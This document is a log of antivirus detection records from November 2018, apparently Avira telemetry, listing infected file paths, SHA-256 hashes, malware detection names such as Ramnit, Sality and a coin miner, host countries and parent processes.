  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:54:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:34:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:42:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:28:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:36:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{EC6F2C17-FD0A-4CBB-BF5F-B973B9BA79FA}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='f63a35fdaa330db8c95a8702c31b2a4ee0f457c0ae00fdd4bed7e90c101caa91', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:01:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083516-6517b6f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4676877a\\AVSCAN-20181101-083448-5FCD14D4\\AVSCAN-20181101-083516-6517B6F7', filesize=20000, name='TR/Dialer.cvk.#M1.#R1'), hash='f68c9bf1d58ca345a9e06babc2be7f7c8c463bf3322b5a26358d1ed9879ba438', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f699d02090acce4fdbee30279a93642e5a51ca81a408abf8a6293e63ac13b5dc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F699D02090ACCE4FDBEE30279A93642E5A51CA81A408ABF8A6293E63AC13B5DC', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='f699d02090acce4fdbee30279a93642e5a51ca81a408abf8a6293e63ac13b5dc', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:41:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:31:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:24:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:44:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='G:\\RAID数据恢复\\c\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T09:26:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:41:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M0.#R0'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:59:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:56:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:39:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:30:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:52:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f741f5311855fc6ed77ce20b8485176c0cc2ada909bc68997e8a2e4bd5cdae43', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F741F5311855FC6ED77CE20B8485176C0CC2ADA909BC68997E8A2E4BD5CDAE43', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f741f5311855fc6ed77ce20b8485176c0cc2ada909bc68997e8a2e4bd5cdae43', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f7ebe4b5dc142163af430333a96d45443f54059a605e6edd78e600b325e82c5c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F7EBE4B5DC142163AF430333A96D45443F54059A605E6EDD78E600B325E82C5C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f7ebe4b5dc142163af430333a96d45443f54059a605e6edd78e600b325e82c5c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f856630bbf214c28a94fdee5795ff99204ed58d6c997890f6ed937d811ba8cab', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F856630BBF214C28A94FDEE5795FF99204ED58D6C997890F6ED937D811BA8CAB', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f856630bbf214c28a94fdee5795ff99204ed58d6c997890f6ed937d811ba8cab', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:51:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\MSOCache\\All Users\\{90140000-006E-0416-0000-0000000FF1CE}-C\\dwtrig20.exe', filesize=644000, name='W32/Neshta.A.#M1.#R1'), hash='f8d1aad24dd3f8c7b079c7c98dba57ae56a5562860b6a5f3e1aaa6113b0ebfbe', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\PROGRA~2\\\\\\\\Avira\\\\\\\\Launcher\\\\\\\\AVIRAS~2.EXE\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-01T16:44:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='invoice_cam.doc', filepath='invoice_cam.doc', filesize=192000, name='HEUR/AGEN.1004823.#M15.#R1004823'), hash='f92e23a4882a395b3b1a1c8cd8bee63422876451f4fb0df3c6efb3829d8c5524', metadata=Row(cmdline=None, country='PA', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:35:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f96dd5657288d7f96f2d44cc0fb478c7dd96bbd2868e2f61c034cad0ba342e83', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F96DD5657288D7F96F2D44CC0FB478C7DD96BBD2868E2F61C034CAD0BA342E83', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f96dd5657288d7f96f2d44cc0fb478c7dd96bbd2868e2f61c034cad0ba342e83', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:51:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00251dd7', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00251dd7', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:34:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252206', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252206', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:39:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00251eba', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00251eba', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:35:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00251e8d', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00251e8d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:35:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00251f76', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00251f76', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:36:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00251ed5', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00251ed5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:36:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp002525cc', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp002525cc', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:44:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252551', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252551', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:44:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252a21', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252a21', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:50:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252a14', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252a14', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:50:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp002520e1', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp002520e1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:38:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252626', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252626', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:45:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp002527d1', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp002527d1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:47:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252071', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252071', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:37:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0025201b', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp0025201b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:37:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252451', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252451', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:42:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252636', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252636', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:45:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f970770bcc81d2cd755852fe59a587caa2d16f5ec03a7877e56650cdef4754ef', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F970770BCC81D2CD755852FE59A587CAA2D16F5EC03A7877E56650CDEF4754EF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f970770bcc81d2cd755852fe59a587caa2d16f5ec03a7877e56650cdef4754ef', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234008-208d6968', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e5898a29\\AVSCAN-20181101-173653-C48861B1\\AVSCAN-20181101-234008-208D6968', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='f9791dd197f1dd6d6732409acee55bbf0b29c6ed290779a2084981f8f4a7e17f', metadata=Row(cmdline=None, country='EE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:40:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gccustomhook.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\AdobeGCClient\\customhook\\gccustomhook.exe', filesize=1976000, name='W32/Sality.AT.#M1.#R1'), hash='f9ad4e88dc6d468f7e5dbaf4ee5246095b2c767ccd9da38dee4f1f149f917baf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:43:23Z'), dt=datetime.date(2018, 11, 1)),
